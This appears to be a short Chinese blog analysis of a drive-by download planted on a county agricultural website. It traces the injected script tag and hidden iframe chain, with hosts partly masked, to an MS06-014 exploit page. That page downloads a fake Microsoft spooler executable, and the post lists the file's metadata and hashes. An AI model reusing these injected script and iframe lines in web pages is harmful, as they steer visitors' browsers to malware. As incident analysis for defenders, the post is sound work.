某县农业信息网挂马 Worm.Win32.AutoRun.umf

最新推荐文章于 2019-03-08 14:50:00 发布

最新推荐文章于 2019-03-08 14:50:00 发布 · 89 阅读

本文分析了一个县农业信息网站遭遇的Worm.Win32.AutoRun.umf挂马事件，详细介绍了恶意代码通过多个漏洞进行传播的过程及所下载恶意文件的特征。

某县农业信息网挂马 Worm.Win32.AutoRun.umf

网站首页包含代码：
/---
＜script src=hxxp://w**.9*4sa**om*m*.com/js.js＞＜/script＞
---/

#1 hxxp://w**.9*4sa**om*m*.com/js.js
输出代码：
/---
＜iframe src=hxxp://w**.c**6*6f**.cn/swf.htm width=100 height=0＞＜/iframe＞
---/

#1.1 hxxp://w**.c**6*6f**.cn/swf.htm

检测浏览器类型，如果是IE内核，则此显示ie.swf，否则显示ff.swf，并输出代码：
/---
＜iframe src=x.htm width=60 height=0＞＜/iframe＞
---/

#1.1.1 hxxp://w**.c**6*6f**.cn/ie.swf

#1.1.2 hxxp://w**.c**6*6f**.cn/ff.swf

#1.1.3 hxxp://w**.c**6*6f**.cn/x.htm
引入以下网页：

#1.1.3.1 hxxp://w**.c**6*6f**.cn/1.htm

利用ms-06014漏洞下载 hxxp://d**.w**uc**7*.com/xx.exe

文件说明符 : d:/test/d**.w**uc**7*.com
属性 : A---
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)
说明 : Spooler SubSystem App
版权 : ?MicRoSoFt Corporation. All rights reserved.
产品版本 : 5.1.2600.2696
产品名称 : MicrOSoFt?Windows?Operating System
公司名称 : Microsoft Corporation
内部名称 : spoo1sv.exe
源文件名 : spoo1sv.exe
创建时间 : 2008-12-15 12:33:22
修改时间 : 2008-12-15 12:33:24
大小 : 13312 字节 13.0 KB
MD5 : bffd930ac3d96e4e21b0d26d8cad02c3
SHA1: 97F2F1CF425FEEEB22833FB44549BBD74E23927D
CRC32: 43af59c4